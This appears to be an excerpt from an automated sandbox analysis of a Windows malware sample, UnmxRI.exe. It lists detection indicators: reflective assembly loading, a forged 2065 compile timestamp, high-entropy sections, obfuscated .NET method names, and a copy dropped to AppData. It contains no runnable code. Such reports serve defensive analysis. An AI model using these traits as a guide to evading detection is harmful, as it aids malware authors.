                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs.Net Code: ooYpdiDj1 System.AppDomain.Load(byte[])
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs.Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs.Net Code: hwUiEND30
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs.Net Code: ooYpdiDj1 System.AppDomain.Load(byte[])
                    Source: UnmxRI.exeStatic PE information: 0xB2BAD165 [Wed Jan 7 21:02:29 2065 UTC]
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A63602 push esp; retf 0_2_06A63603
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A65F39 push es; retf 0_2_06A65F88
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A65F1F push es; retf 0_2_06A65F24
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A65F1F push es; retf 0_2_06A65F88
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A660A5 push es; retf 0_2_06A660AC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 0_2_06A66171 push es; iretd 0_2_06A6618C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040D008 push FFFFFFE5h; retf 9_2_0040D01C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00405151 push ebx; ret 9_2_00405152
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040193D pushfd ; iretd 9_2_00401948
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0042B9E2 push eax; ret 9_2_0042B9E4
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004189E4 pushad ; iretd 9_2_004189E5
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004024B6 push ss; iretd 9_2_004024BC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_004025A6 push ss; iretd 9_2_004025AC
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0041467F push ebx; ret 9_2_00414682
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00403620 push eax; ret 9_2_00403622
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00413E36 push ss; ret 9_2_00413E3F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00404F1F push esi; iretd 9_2_00404F2E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040CFF6 push 00000003h; retf 9_2_0040CFF8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00419FBD push 3CBDF370h; iretd 9_2_00419FC2
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0187225F pushad ; ret 9_2_018727F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018727FA pushad ; ret 9_2_018727F9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A09AD push ecx; mov dword ptr [esp], ecx9_2_018A09B6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0187283D push eax; iretd 9_2_01872858
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01871368 push eax; iretd 9_2_01871369
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD3602 push esp; retf 10_2_06AD3603
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD60A5 push es; retf 10_2_06AD60AC
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD6171 push es; iretd 10_2_06AD618C
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD5F39 push es; retf 10_2_06AD5F88
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 10_2_06AD5F1D push es; retf 10_2_06AD5F24
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0119C54D pushfd ; ret 14_2_0119C54E
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0119C54F push 8B011267h; ret 14_2_0119C554
                    Source: UnmxRI.exeStatic PE information: section name: .text entropy: 6.837498475160513
                    Source: tehuvFgZlLZK.exe.0.drStatic PE information: section name: .text entropy: 6.837498475160513
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Spvk00L9cFCStkrT2y.csHigh entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, SgowY8X4yixBwmDipa9.csHigh entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Bwauf9aYS7ZpZv1l2M.csHigh entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, gWomal9AEbM4h0nux8.csHigh entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.csHigh entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, G8ANMjDiUOOsLbf5bW.csHigh entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QqOQQeGEHtIKD26w4j.csHigh entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, yx3SuvyOU8mOkkWcOq.csHigh entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, SymJM23RQnEk4iIX2O.csHigh entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Ekk9xhzYCDV7Ex5F26.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, p9w2kf7E5ROrPRdwHn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, dy4scYnfQbod41ZQD7.csHigh entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, dTCWREXjx9L4UMSOtYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, wg7S07bfqZusaPsJR7.csHigh entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QvFRFSSlmclI2FDck0.csHigh entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Kwv8QvRh4iT7DFlSdJ.csHigh entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, NXBkOsdoPa6RYALGIN.csHigh entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, SXZXiSZvQcU2WLCXGo.csHigh entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YMmuGV8NrauB8XDf6k.csHigh entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Spvk00L9cFCStkrT2y.csHigh entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SgowY8X4yixBwmDipa9.csHigh entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Bwauf9aYS7ZpZv1l2M.csHigh entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, gWomal9AEbM4h0nux8.csHigh entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.csHigh entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, G8ANMjDiUOOsLbf5bW.csHigh entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QqOQQeGEHtIKD26w4j.csHigh entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, yx3SuvyOU8mOkkWcOq.csHigh entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SymJM23RQnEk4iIX2O.csHigh entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Ekk9xhzYCDV7Ex5F26.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, p9w2kf7E5ROrPRdwHn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, dy4scYnfQbod41ZQD7.csHigh entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, dTCWREXjx9L4UMSOtYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, wg7S07bfqZusaPsJR7.csHigh entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QvFRFSSlmclI2FDck0.csHigh entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Kwv8QvRh4iT7DFlSdJ.csHigh entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, NXBkOsdoPa6RYALGIN.csHigh entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SXZXiSZvQcU2WLCXGo.csHigh entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YMmuGV8NrauB8XDf6k.csHigh entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.csHigh entropy of concatenated method names: 'icjOT7esaw', 'RgtTUJcyZL', 'tgAOeop8hG', 'SQdOgp9kxG', 'QvUO4fqikd', 'g2kOnTKoV9', 'gdqsYhH0gi7JU', 'pRVYZ8BkJ', 'JseuiWZFl', 'DLEr932Lv'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.csHigh entropy of concatenated method names: 'fLj0Eu470', 'El4O7BbVw', 'hwUiEND30', 'HSH8bFl4M', 'ooYpdiDj1', 'HOPAJfGB3', 'qnP3At5It', 'uFCygHQ01', 'zCkJygWNp', 'NIEFabhsg'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, yfqikd0p32kTKoV93bB.csHigh entropy of concatenated method names: 'ijUOUUVsdX', 'JQtOjsnu1l', 'NUtOMveQlB', 'qEqOEHEb3H', 'TxnO95b71H', 'jB8Oxm27U0', 'ATROQ4dcm2', 'abbOdnfCZw', 'PBiO6KDnyP', 'v95Ot388NV'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Spvk00L9cFCStkrT2y.csHigh entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SgowY8X4yixBwmDipa9.csHigh entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Bwauf9aYS7ZpZv1l2M.csHigh entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, gWomal9AEbM4h0nux8.csHigh entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.csHigh entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, G8ANMjDiUOOsLbf5bW.csHigh entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QqOQQeGEHtIKD26w4j.csHigh entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, yx3SuvyOU8mOkkWcOq.csHigh entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SymJM23RQnEk4iIX2O.csHigh entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Ekk9xhzYCDV7Ex5F26.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, p9w2kf7E5ROrPRdwHn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, dy4scYnfQbod41ZQD7.csHigh entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, dTCWREXjx9L4UMSOtYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, wg7S07bfqZusaPsJR7.csHigh entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QvFRFSSlmclI2FDck0.csHigh entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Kwv8QvRh4iT7DFlSdJ.csHigh entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, NXBkOsdoPa6RYALGIN.csHigh entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SXZXiSZvQcU2WLCXGo.csHigh entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YMmuGV8NrauB8XDf6k.csHigh entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.csHigh entropy of concatenated method names: 'icjOT7esaw', 'RgtTUJcyZL', 'tgAOeop8hG', 'SQdOgp9kxG', 'QvUO4fqikd', 'g2kOnTKoV9', 'gdqsYhH0gi7JU', 'pRVYZ8BkJ', 'JseuiWZFl', 'DLEr932Lv'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.csHigh entropy of concatenated method names: 'fLj0Eu470', 'El4O7BbVw', 'hwUiEND30', 'HSH8bFl4M', 'ooYpdiDj1', 'HOPAJfGB3', 'qnP3At5It', 'uFCygHQ01', 'zCkJygWNp', 'NIEFabhsg'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, yfqikd0p32kTKoV93bB.csHigh entropy of concatenated method names: 'ijUOUUVsdX', 'JQtOjsnu1l', 'NUtOMveQlB', 'qEqOEHEb3H', 'TxnO95b71H', 'jB8Oxm27U0', 'ATROQ4dcm2', 'abbOdnfCZw', 'PBiO6KDnyP', 'v95Ot388NV'
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
